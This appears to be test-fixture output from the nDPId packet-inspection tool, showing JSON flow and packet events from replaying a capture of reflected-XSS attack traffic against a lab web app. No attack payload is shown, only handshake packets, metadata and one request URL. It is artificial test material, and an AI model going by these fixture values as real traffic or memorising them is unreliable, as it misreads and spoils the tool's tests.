+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":3,"flow_last_seen":1499347347484,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347347484,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D8pAAD4Gtg6sEAABwKgKMtuiAFCZ3FUcYtOXTYAQAOWtpwAAAQEICgE6WtID5CxI"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3176,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347348776,"flow_last_seen":1499347348776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347348776,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56240,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3176,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1499347348776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347348776,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8P2lAAD4GhmesEAABwKgKMtuwAFBd3mN8AAAAAKACchBkWQAAAgQFtAQCCAoBOlwVAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":2,"flow_last_seen":1499347348776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347348776,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ27AjVjRJXd5jfaAScSDcKQAAAgQFtAQCCAoD5C2LATpcFQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3178,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":3,"flow_last_seen":1499347348777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347348777,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0P2pAAD4Ghm6sEAABwKgKMtuwAFBd3mN9I1Y0SoAQAOV7MAAAAQEICgE6XBYD5C2L"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347351299,"flow_last_seen":1499347351299,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347351299,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1499347351299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347351299,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XeBAAD4GZ\/CsEAABwKgKMtvKAFA3cANsAAAAAKACchDoRgAAAgQFtAQCCAoBOl6MAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3191,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":2,"flow_last_seen":1499347351299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347351299,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ28rLt8HDN3ADbaAScSAnxAAAAgQFtAQCCAoD5DACATpejAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":3,"flow_last_seen":1499347351300,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347351300,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XeFAAD4GZ\/esEAABwKgKMtvKAFA3cANty7fBxIAQAOXGywAAAQEICgE6XowD5DAC"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347352698,"flow_last_seen":1499347352698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347352698,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1499347352698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347352698,"pkt":"ABm5CmnxAMGxFOsxCABFAAA894dAAD4GzkisEAABwKgKMtvYAFB9d6htAAAAAKACchD70QAAAgQFtAQCCAoBOl\/qAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3203,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":2,"flow_last_seen":1499347352699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347352699,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ29gsQT\/ffXeobqAScSBbTAAAAgQFtAQCCAoD5DFgATpf6gEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":3,"flow_last_seen":1499347352699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347352699,"pkt":"ABm5CmnxAMGxFOsxCABFAAA094hAAD4Gzk+sEAABwKgKMtvYAFB9d6huLEE\/4IAQAOX6UwAAAQEICgE6X+oD5DFg"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347219208,"flow_last_seen":1499347224678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54862,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347219208,"flow_last_seen":1499347224678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54862,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347220447,"flow_last_seen":1499347225677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54876,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347220447,"flow_last_seen":1499347225677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54876,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347221694,"flow_last_seen":1499347227677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54890,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347221694,"flow_last_seen":1499347227677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347224338,"flow_last_seen":1499347229678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54916,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347224338,"flow_last_seen":1499347229678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347225590,"flow_last_seen":1499347230679,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54930,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347225590,"flow_last_seen":1499347230679,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54930,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347163177,"flow_last_seen":1499347230695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232658,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347355229,"flow_last_seen":1499347355229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347355229,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1499347355229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347355229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GHxAAD4GrVSsEAABwKgKMtvyAFB7gnofAAAAAKACchApggAAAgQFtAQCCAoBOmJjAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":1499347355229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347355229,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2\/L7jmGSe4J6IKAScSCVgwAAAgQFtAQCCAoD5DPYATpiYwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":3,"flow_last_seen":1499347355230,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347355230,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GH1AAD4GrVusEAABwKgKMtvyAFB7gnog+45hk4AQAOU0iwAAAQEICgE6YmMD5DPY"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3232,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347356478,"flow_last_seen":1499347356478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347356478,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3232,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1499347356478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347356478,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hsZAAD4GPwqsEAABwKgKMtwAAFAJPOVdAAAAAKACchAvRAAAAgQFtAQCCAoBOmObAAAAAAEDAwc="} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3233,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":2,"flow_last_seen":1499347356478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347356478,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3AC\/\/WVQCTzlXqAScSDR3wAAAgQFtAQCCAoD5DURATpjmwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":3,"flow_last_seen":1499347356478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347356478,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hsdAAD4GPxGsEAABwKgKMtwAAFAJPOVev\/1lUYAQAOVw5wAAAQEICgE6Y5sD5DUR"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347357727,"flow_last_seen":1499347357727,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347357727,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56334,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1499347357727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347357727,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8p9BAAD4GHgCsEAABwKgKMtwOAFCyy8MDAAAAAKACchCmyAAAAgQFtAQCCAoBOmTTAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3248,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":1499347357727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347357727,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3A4qYd\/GssvDBKAScSBjUgAAAgQFtAQCCAoD5DZJATpk0wEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":3,"flow_last_seen":1499347357728,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347357728,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0p9FAAD4GHgesEAABwKgKMtwOAFCyy8MEKmHfx4AQAOUCWgAAAQEICgE6ZNMD5DZJ"} 
+00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347355229,"flow_last_seen":1499347360034,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347360034,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347360285,"flow_last_seen":1499347360285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347360285,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1499347360285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347360285,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8h\/1AAD4GPdOsEAABwKgKMtwoAFB3hOCvAAAAAKACchDBygAAAgQFtAQCCAoBOmdSAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":2,"flow_last_seen":1499347360285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347360285,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Ci3TdMGd4TgsKAScSD7qAAAAgQFtAQCCAoD5DjIATpnUgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3268,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":3,"flow_last_seen":1499347360286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347360286,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0h\/5AAD4GPdqsEAABwKgKMtwoAFB3hOCwt03TB4AQAOWarwAAAQEICgE6Z1MD5DjI"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3275,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347361540,"flow_last_seen":1499347361540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347361540,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56374,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3275,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1499347361540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347361540,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8izFAAD4GOp+sEAABwKgKMtw2AFCL9eO9AAAAAKACchCpAwAAAgQFtAQCCAoBOmiMAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3276,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":2,"flow_last_seen":1499347361540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347361540,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Db87gPNi\/XjvqAScSBrQAAAAgQFtAQCCAoD5DoCATpojAEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":3,"flow_last_seen":1499347361541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347361541,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0izJAAD4GOqasEAABwKgKMtw2AFCL9eO+\/O4DzoAQAOUKRwAAAQEICgE6aI0D5DoC"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3298,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347364056,"flow_last_seen":1499347364056,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364056,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 